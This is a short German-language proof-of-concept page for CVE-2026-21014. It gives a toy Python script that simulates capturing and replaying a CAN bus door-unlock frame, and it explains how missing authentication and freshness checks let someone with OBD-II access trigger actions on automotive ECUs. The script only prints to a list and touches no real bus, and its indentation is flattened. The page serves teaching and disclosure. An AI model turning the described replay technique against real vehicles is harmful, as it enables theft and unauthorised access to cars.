
Spielt aufgezeichnete CAN-Bus-Frames erneut ab, um CVE-2026-21014 zu demonstrieren und zu zeigen, wie fehlende Authentifizierung und Frischeprüfungen nicht autorisierte Aktionen von Automotive-ECUs ermöglichen.
# can_replay_sim.py - Simulates CAN bus replay
import time
can_messages = []
def send_can(msg_id, data):
print(f"CAN {msg_id:#x}: {data.hex()}")
can_messages.append((msg_id, data))
def receive_can():
return can_messages[-1] if can_messages else None
# Simulate car sending "door unlock" command
send_can(0x100, b'\x01\x00\x00\x00') # unlock
# Attacker replays captured frame
time.sleep(1)
captured = receive_can()
if captured:
print("Replaying captured frame...")
send_can(captured[0], captured[1])
Ein automotives Controller Area Network (CAN) implementiert keine Nachrichtenauthentifizierung oder Frischeprüfungen. Ein Angreifer mit physischem Zugriff auf den OBD‑II-Port kann ein legitimes Frame (z. B. Tür entriegeln) erfassen und später erneut abspielen, um unbefugte Aktionen auszuführen.
Führen Sie die Simulation aus:
python can_replay_sim.py
Das Skript gibt das Erfassen und erneute Abspielen eines Entriegelungsbefehls aus.